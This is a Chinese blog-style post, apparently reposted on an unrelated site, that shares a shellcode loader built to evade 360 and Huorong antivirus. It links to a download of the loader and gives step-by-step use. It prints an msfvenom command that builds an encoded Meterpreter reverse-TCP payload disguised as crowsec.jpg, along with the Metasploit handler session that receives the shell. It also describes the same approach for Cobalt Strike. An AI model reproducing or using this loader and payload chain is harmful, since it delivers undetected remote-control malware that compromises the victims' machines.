【工具分享】免杀360&火绒的shellcode加载器 |
您所在的位置:网站首页 › exe加载器 › 【工具分享】免杀360&火绒的shellcode加载器 |
【工具分享】免杀360&火绒的shellcode加载器1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏。。。 代码和思路暂不开源! 你可以在我的GitHub上下载该工具:https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog 如果你访问GitHub困难,你可以在乌鸦安全公众号后台直接回复关键字:加载器 下载! 方法:生成msf或cs的shellcode原生格式,命名为crowsec.jpg(这个是写死的),将其和crowsec_shelllcodeBypass.exe(这个名字可以修改的)放在一个目录下,直接双击即可! 1.1 当前1.2 半年前 这个shellcode加载器工具是我在2021-06-21号做的,优化之后VT查杀为0/68,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68。 2021-06-21是能过火绒、360、Windows Defender(关闭自动发送可疑样本) 前几天在测试的时候,发现过不了Windows Defender,今天稍微优化了一下,发现还是过不了Windows Defender,主要原因是识别了msf的部分特征!!! 鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(*),至少还能过360和火绒。(放出来之后,基本上几小时就没用了,所以仅供参考!)。 查询时间:2022.01.19 3. 使用方法3.1. msf上线在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码,编码之后的shellcode并不是所有杀软都识别不出来,详情可以看我以前的文章: 老树开新花之shellcode_launcher免杀Windows Defendermsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00' lhost=10.211.55.2 lport=1234 -f raw -o crowsec.jpg 使用msf进行监听: msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set LHOST 0.0.0.0LHOST => 0.0.0.0msf6 exploit(multi/handler) > set LPORT 1234LPORT => 1234msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 0.0.0.0:1234 3.1.1 3603.1.2 Windows Defender 3.1.3 火绒3.2 Cobalt Strike上线 在这里只说思路,能够过火绒和360,但是不能过Windows Defender,同样的问题:特征出现在shellcode上面。 将文件保存为crowsec.jpg(下图是一个示例,主要是太累了,不想换了。。。) 现将生成的bin文件修改为png文件,然后双击上线操作 但是这里可以发现,当前的payload已经被标记特征,直接被杀,但是免杀360和火绒是不影响的。 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |